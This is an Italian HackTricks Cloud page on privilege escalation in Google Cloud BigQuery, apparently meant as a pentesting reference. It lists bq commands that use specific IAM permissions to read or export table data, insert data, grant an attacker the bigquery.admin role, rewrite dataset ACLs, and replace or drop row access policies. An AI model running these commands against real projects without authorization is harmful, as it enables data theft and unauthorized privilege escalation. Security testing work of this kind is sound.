GCP - BigQuery Privesc

Impara e pratica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Impara e pratica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Supporta HackTricks

Controlla i piani di abbonamento!
Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos di github.

BigQuery

Per maggiori informazioni su BigQuery controlla:

GCP - Bigquery Enum

Leggere la Tabella

Leggendo le informazioni memorizzate all'interno di una tabella BigQuery potrebbe essere possibile trovare informazioni sensibili. Per accedere alle informazioni sono necessarie le autorizzazioni bigquery.tables.get, bigquery.jobs.create e bigquery.tables.getData:

bq head <dataset>.<table>
bq query --nouse_legacy_sql 'SELECT * FROM `<proj>.<dataset>.<table-name>` LIMIT 1000'

Esportare dati

Questo è un altro modo per accedere ai dati. Esportarli in un bucket di cloud storage e scaricare i file con le informazioni. Per eseguire questa azione sono necessarie le seguenti autorizzazioni: bigquery.tables.export, bigquery.jobs.create e storage.objects.create.

bq extract <dataset>.<table> "gs://<bucket>/table*.csv"

Inserire dati

Potrebbe essere possibile introdurre determinati dati attendibili in una tabella Bigquery per abusare di una vulnerabilità in un altro luogo. Questo può essere facilmente fatto con i permessi bigquery.tables.get, bigquery.tables.updateData e bigquery.jobs.create:

# Via query
bq query --nouse_legacy_sql 'INSERT INTO `<proj>.<dataset>.<table-name>` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'

# Via insert param
bq insert dataset.table /tmp/mydata.json

`bigquery.datasets.setIamPolicy`

Un attaccante potrebbe abusare di questo privilegio per darsi ulteriori permessi su un dataset BigQuery:

# For this you also need bigquery.tables.getIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>

# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy

`bigquery.datasets.update`, (`bigquery.datasets.get`)

Solo questo permesso consente di aggiornare il tuo accesso su un dataset BigQuery modificando gli ACL che indicano chi può accedervi:

# Download current permissions, reqires bigquery.datasets.get
bq show --format=prettyjson <proj>:<dataset> > acl.json
## Give permissions to the desired user
bq update --source acl.json <proj>:<dataset>
## Read it with
bq head $PROJECT_ID:<dataset>.<table>

`bigquery.tables.setIamPolicy`

Un attaccante potrebbe abusare di questo privilegio per concedersi ulteriori permessi su una tabella BigQuery:

# For this you also need bigquery.tables.setIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>.<table>

# use the set-iam-policy if you don't have bigquery.tables.setIamPolicy

`bigquery.rowAccessPolicies.update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`

Secondo la documentazione, con i permessi menzionati è possibile aggiornare una policy di riga. Tuttavia, usando il cli bq ne servono altri: bigquery.rowAccessPolicies.create, bigquery.tables.get.

bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY <filter_id> ON `<proj>.<dataset-name>.<table-name>` GRANT TO ("<user:user@email.xyz>") FILTER USING (term = "Cfba");' # A example filter was used

È possibile trovare l'ID del filtro nell'output dell'enumerazione delle politiche di riga. Esempio:

bq ls --row_access_policies <proj>:<dataset>.<table>

Id        Filter Predicate            Grantees              Creation Time    Last Modified Time
------------- ------------------ ----------------------------- ----------------- --------------------
apac_filter   term = "Cfba"      user:asd@hacktricks.xyz   21 Jan 23:32:09   21 Jan 23:32:09

Se hai bigquery.rowAccessPolicies.delete invece di bigquery.rowAccessPolicies.update puoi anche semplicemente eliminare la policy:

# Remove one
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICY <policy_id> ON `<proj>.<dataset-name>.<table-name>`;'

# Remove all (if it's the last row policy you need to use this
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICIES ON `<proj>.<dataset-name>.<table-name>`;'

Un'altra potenziale opzione per bypassare le politiche di accesso alle righe sarebbe semplicemente cambiare il valore dei dati limitati. Se puoi vedere solo quando term è Cfba, modifica tutti i record della tabella per avere term = "Cfba". Tuttavia, questo è impedito da bigquery.

Impara e pratica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Impara e pratica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Supporta HackTricks